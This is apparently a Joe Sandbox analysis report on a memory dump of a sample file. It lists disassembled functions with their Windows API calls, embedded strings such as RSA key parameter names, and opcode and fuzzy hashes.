Prime1, xrefs: 6C93C88A
ModPrime2PrivateExponent, xrefs: 6C93C82C
PrivateExponent, xrefs: 6C93C85F
MultiplicativeInverseOfPrime2ModPrime1, xrefs: 6C93C815
Prime2, xrefs: 6C93C876
ModPrime1PrivateExponent, xrefs: 6C93C840

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: type_info::operator!=
String ID: ModPrime1PrivateExponent$ModPrime2PrivateExponent$MultiplicativeInverseOfPrime2ModPrime1$Prime1$Prime2$PrivateExponent
API String ID: 2241493438-339133643
Opcode ID: e51749c302c63fe1ee85bc7725d19e72d6d9d60c4a46b01500d1076f7167f52f
Instruction ID: 58ae3cead40788f3f43dc075c735012db1c43f747409e2777c87ecad237fb3af
Opcode Fuzzy Hash: e51749c302c63fe1ee85bc7725d19e72d6d9d60c4a46b01500d1076f7167f52f
Instruction Fuzzy Hash: 59318D719183508FC7049F78C94668ABBF1AFE5608F015A2FF4499BB60EB70DC48CB86

Uniqueness

Uniqueness Score: -1.00%

Function 6C900457 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6C9023B3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023C3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023D6
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023E9
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023FC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90240F

Strings

RS%e, xrefs: 6C900494

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RS%e
API String ID: 4225690600-1409579784
Opcode ID: 2a9896c21a5f06678f3537f1c026fdba8bddc61907ce97e2fc56148a015d6c31
Instruction ID: 13dddb86e65734f0697868f857fa37f720702884b746098dff76d857ede04b05
Opcode Fuzzy Hash: 2a9896c21a5f06678f3537f1c026fdba8bddc61907ce97e2fc56148a015d6c31
Instruction Fuzzy Hash: 083149B0B01A189FDB10CFA9CC84B9DB7BEAF99704F24859AE518E7641C771D980CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6C8FAA00 Relevance: 12.3, APIs: 8, Instructions: 309COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6C8FAA54
VariantInit.OLEAUT32(?), ref: 6C8FAA5B
VariantInit.OLEAUT32(?), ref: 6C8FAA62
VariantInit.OLEAUT32(?), ref: 6C8FAA69
VariantClear.OLEAUT32(?), ref: 6C8FACF2
VariantClear.OLEAUT32(?), ref: 6C8FACF9
VariantClear.OLEAUT32(?), ref: 6C8FAD00
VariantClear.OLEAUT32(?), ref: 6C8FAD07

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Variant$ClearInit
String ID:
API String ID: 2610073882-0
Opcode ID: 97cd63bedb1f7d05285f3a97d4acd3ae9b25ac16f03f4b5a52ec1dd467e53258
Instruction ID: c5637af3af3ef3bfa6d7cb90f36aec11dd0b6584e205c6857f608bd186cb9d29
Opcode Fuzzy Hash: 97cd63bedb1f7d05285f3a97d4acd3ae9b25ac16f03f4b5a52ec1dd467e53258
Instruction Fuzzy Hash: D9C146716087009FC310DF69C98099ABBE6BFC8754F248E5DE5A48B764D730E846CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6C8F9D00 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 326COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6C8F9DEB
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6C8F9DFB
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6C8F9E29
SafeArrayDestroy.OLEAUT32(?), ref: 6C8F9F25
VariantClear.OLEAUT32(?), ref: 6C8F9FE5

Strings

@, xrefs: 6C8F9DD7

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArraySafe$Bound$ClearDestroyElementVariant
String ID: @
API String ID: 3214203402-2766056989
Opcode ID: ad6ce8bb487d4f7b045a1557d706357302f8d626e1f8b67adf22fea8ef5c0a0f
Instruction ID: 02466c058d4a98d554d2a1458410905d8e4addf19efc9cf569aadeea6d3c0301
Opcode Fuzzy Hash: ad6ce8bb487d4f7b045a1557d706357302f8d626e1f8b67adf22fea8ef5c0a0f
Instruction Fuzzy Hash: 27D18B71D00249CFDB10DFA8C980AADBBB5FF88308F24856DE525AB754D731AA46CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6C8FB300 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 326COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6C8FB3EB
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6C8FB3FB
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6C8FB429
SafeArrayDestroy.OLEAUT32(?), ref: 6C8FB525
VariantClear.OLEAUT32(?), ref: 6C8FB5E5

Strings

@, xrefs: 6C8FB3D7

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArraySafe$Bound$ClearDestroyElementVariant
String ID: @
API String ID: 3214203402-2766056989
Opcode ID: cd119b809fcd3da499159307459dedd091c49899804acfd9fde5a4e5218de21f
Instruction ID: fb2af2d9696713bd447b4efc444de92286c27855cd0b593dcda83e6bb6e174c1
Opcode Fuzzy Hash: cd119b809fcd3da499159307459dedd091c49899804acfd9fde5a4e5218de21f
Instruction Fuzzy Hash: DED16D71E01249CFDB10DFA8CA80AADBBB5FF48308F24856DD525AB754D734AA46CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6C921580 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 277COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6C9216B2

Part of subcall function 6C94AC75: RaiseException.KERNEL32(?,?,6C949C34,65628154,?,?,?,?,6C949C34,65628154,6C979C90,6C98B974,65628154), ref: 6C94ACB7

__CxxThrowException@8.LIBCMT ref: 6C92180A

Part of subcall function 6C8E4010: std::_Xinvalid_argument.LIBCPMT ref: 6C8E402A

Strings

: message length of , xrefs: 6C92170D
: this key is too short to encrypt any messages, xrefs: 6C92162A
for this public key, xrefs: 6C921771
exceeds the maximum of , xrefs: 6C92173F

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaiseXinvalid_argumentstd::_
String ID: exceeds the maximum of $ for this public key$: message length of $: this key is too short to encrypt any messages
API String ID: 3807434085-412673420
Opcode ID: fe41bd6d2ea997186f9e81e24efea90e080504194e4217a66d03ce054ee21b7c
Instruction ID: e276cc295beec6142ad079c36a11ac878345e02d9e85015c4fa4ce301410b216
Opcode Fuzzy Hash: fe41bd6d2ea997186f9e81e24efea90e080504194e4217a66d03ce054ee21b7c
Instruction Fuzzy Hash: 02B15D751083809FD320DB69C890BDBB7E9AFDA304F14891DE59D83791DB35E909CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6C941250 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6C94126E

Part of subcall function 6C9490D8: std::exception::exception.LIBCMT ref: 6C9490ED
Part of subcall function 6C9490D8: __CxxThrowException@8.LIBCMT ref: 6C949102
Part of subcall function 6C9490D8: std::exception::exception.LIBCMT ref: 6C949113

_memmove.LIBCMT ref: 6C9412E0
_memmove.LIBCMT ref: 6C941305
_memmove.LIBCMT ref: 6C941342
_memmove.LIBCMT ref: 6C94135F

Strings

deque<T> too long, xrefs: 6C941269

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: deque<T> too long
API String ID: 4034224661-309773918
Opcode ID: 1f3cd8893a151ae2b67be55eab5f53df3297ed1ec9080c4d9f9a19e4ff452e75
Instruction ID: 1d6299e61060ed3a1a04d6401836e6fdc8f0eb725d52345331e2068dfd603d8d
Opcode Fuzzy Hash: 1f3cd8893a151ae2b67be55eab5f53df3297ed1ec9080c4d9f9a19e4ff452e75
Instruction Fuzzy Hash: EF411772A042018BD704CE68CD80A6BB7EAEFE4214F1DC62DE809D7B44FA34ED15C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6C9413A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6C9413BE

Part of subcall function 6C9490D8: std::exception::exception.LIBCMT ref: 6C9490ED
Part of subcall function 6C9490D8: __CxxThrowException@8.LIBCMT ref: 6C949102
Part of subcall function 6C9490D8: std::exception::exception.LIBCMT ref: 6C949113

_memmove.LIBCMT ref: 6C941431
_memmove.LIBCMT ref: 6C941456
_memmove.LIBCMT ref: 6C941493
_memmove.LIBCMT ref: 6C9414B0

Strings

deque<T> too long, xrefs: 6C9413B9

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: deque<T> too long
API String ID: 4034224661-309773918
Opcode ID: 0dca7e81e439af5d43151796d18821dbfb10f38d313c9e0d897bb20f05fdef02
Instruction ID: 09748b2f947de049d06e927f24bba849851c5c41dce4e76d18bcec97458afb19
Opcode Fuzzy Hash: 0dca7e81e439af5d43151796d18821dbfb10f38d313c9e0d897bb20f05fdef02
Instruction Fuzzy Hash: 8A410472A042048BC714CE68DD9196BB7EAEBD4214F1AC62CE809D7B44FA34ED19C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6C8E4D90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6C8E4DA9

Part of subcall function 6C949125: std::exception::exception.LIBCMT ref: 6C94913A
Part of subcall function 6C949125: __CxxThrowException@8.LIBCMT ref: 6C94914F
Part of subcall function 6C949125: std::exception::exception.LIBCMT ref: 6C949160

std::_Xinvalid_argument.LIBCPMT ref: 6C8E4DCA
std::_Xinvalid_argument.LIBCPMT ref: 6C8E4DE5
_memmove.LIBCMT ref: 6C8E4E4D

Strings

string too long, xrefs: 6C8E4DC5, 6C8E4DE0
invalid string position, xrefs: 6C8E4DA4

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 443534600-4289949731
Opcode ID: 7141e916cec05f6971c579d8e45c8ff148c63cd7e651c7801ec9940bdbf6c843
Instruction ID: 4e6671edfc0ae0603756fede48ffba7788e88b9e94e8c41baccd61587b4f48b2
Opcode Fuzzy Hash: 7141e916cec05f6971c579d8e45c8ff148c63cd7e651c7801ec9940bdbf6c843
Instruction Fuzzy Hash: A231C8323042158FD3348E9CE980B6AF3E9ABDA725B204E2EE55ACBF41D771D8448791

Uniqueness

Uniqueness Score: -1.00%

Function 6C9544E9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 6C954532
DName::operator+.LIBCMT ref: 6C954539
DName::DName.LIBCMT ref: 6C95455B
DName::operator+.LIBCMT ref: 6C954562
DName::operator+.LIBCMT ref: 6C954569

Strings

throw(, xrefs: 6C95452A, 6C954553

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Name::operator+$NameName::
String ID: throw(
API String ID: 168861036-3159766648
Opcode ID: b6adb54a7ef98d9674ba31e264a162ae7adf03d6e154d1c98660a6bb5120c42d
Instruction ID: 5cd53c278984d301b00d79a0c4837207a5da715d0d4abad5cb6c24139f2dcf15
Opcode Fuzzy Hash: b6adb54a7ef98d9674ba31e264a162ae7adf03d6e154d1c98660a6bb5120c42d
Instruction Fuzzy Hash: 8301B5B4A00109AFCF04DFA4C845DFD7BB9EBA434CF804155E5019B794DB70DA6A8B90

Uniqueness

Uniqueness Score: -1.00%

Function 6C94CCF3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 6C94CCFA

Part of subcall function 6C94EA6D: GetLastError.KERNEL32(?,?,6C94D7DD,6C949DEF,00000000,?,6C949BD4,6C8E1290,65628154), ref: 6C94EA71
Part of subcall function 6C94EA6D: ___set_flsgetvalue.LIBCMT ref: 6C94EA7F
Part of subcall function 6C94EA6D: __calloc_crt.LIBCMT ref: 6C94EA93
Part of subcall function 6C94EA6D: DecodePointer.KERNEL32(00000000,?,?,6C94D7DD,6C949DEF,00000000,?,6C949BD4,6C8E1290,65628154), ref: 6C94EAAD
Part of subcall function 6C94EA6D: GetCurrentThreadId.KERNEL32 ref: 6C94EAC3
Part of subcall function 6C94EA6D: SetLastError.KERNEL32(00000000,?,?,6C94D7DD,6C949DEF,00000000,?,6C949BD4,6C8E1290,65628154), ref: 6C94EADB

__calloc_crt.LIBCMT ref: 6C94CD1C
__get_sys_err_msg.LIBCMT ref: 6C94CD3A
_strcpy_s.LIBCMT ref: 6C94CD42
__invoke_watson.LIBCMT ref: 6C94CD57

Strings

Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 6C94CD07, 6C94CD2A

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
API String ID: 3117964792-798102604
Opcode ID: e59f6cf038447d3d14c64c8c1943c1a83b506d9e2169721f2ac3368c9c5ea7c3
Instruction ID: 10ee326f79ae72cd49e1ab7bd620edeebc72ca85146263713e35f3199b26b888
Opcode Fuzzy Hash: e59f6cf038447d3d14c64c8c1943c1a83b506d9e2169721f2ac3368c9c5ea7c3
Instruction Fuzzy Hash: F0F059736083342FD3103A6B9C80D9F7AACDBB272CB09893AF54897F40E621DC0C4294

Uniqueness

Uniqueness Score: -1.00%

Function 6C94E9B9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,6C979880,00000008,6C94EAC1,00000000,00000000,?,?,6C94D7DD,6C949DEF,00000000,?,6C949BD4,6C8E1290,65628154), ref: 6C94E9CA
__lock.LIBCMT ref: 6C94E9FE

Part of subcall function 6C952438: __mtinitlocknum.LIBCMT ref: 6C95244E
Part of subcall function 6C952438: __amsg_exit.LIBCMT ref: 6C95245A
Part of subcall function 6C952438: EnterCriticalSection.KERNEL32(6C949BD4,6C949BD4,?,6C94EA03,0000000D), ref: 6C952462

InterlockedIncrement.KERNEL32(FFFFFEF5), ref: 6C94EA0B
__lock.LIBCMT ref: 6C94EA1F
___addlocaleref.LIBCMT ref: 6C94EA3D

Strings

KERNEL32.DLL, xrefs: 6C94E9C5

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: 6459a9ec5b4c6473238362306a59ae7d503fba13033291c74cec0bcfa7c36077
Instruction ID: a7b1589bc889212a997e473d028bcae6d3494b900bc0c5a9273c1c3f7b6a0ae0
Opcode Fuzzy Hash: 6459a9ec5b4c6473238362306a59ae7d503fba13033291c74cec0bcfa7c36077
Instruction Fuzzy Hash: 07013971545B00EEE720DF66C509789FBE0AF62318F60894ED49A97BA0CB70E648CB25

Uniqueness

Uniqueness Score: -1.00%

Function 6C8FE120 Relevance: 9.4, APIs: 6, Instructions: 364COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(00000000,?,?), ref: 6C8FE29B
SafeArrayGetUBound.OLEAUT32(00000000,?,?), ref: 6C8FE2B6
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6C8FE2D7

Part of subcall function 6C905760: std::tr1::_Xweak.LIBCPMT ref: 6C905769

SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6C8FE309

Part of subcall function 6C949BB5: _malloc.LIBCMT ref: 6C949BCF

SafeArrayDestroy.OLEAUT32(00000000), ref: 6C8FE523
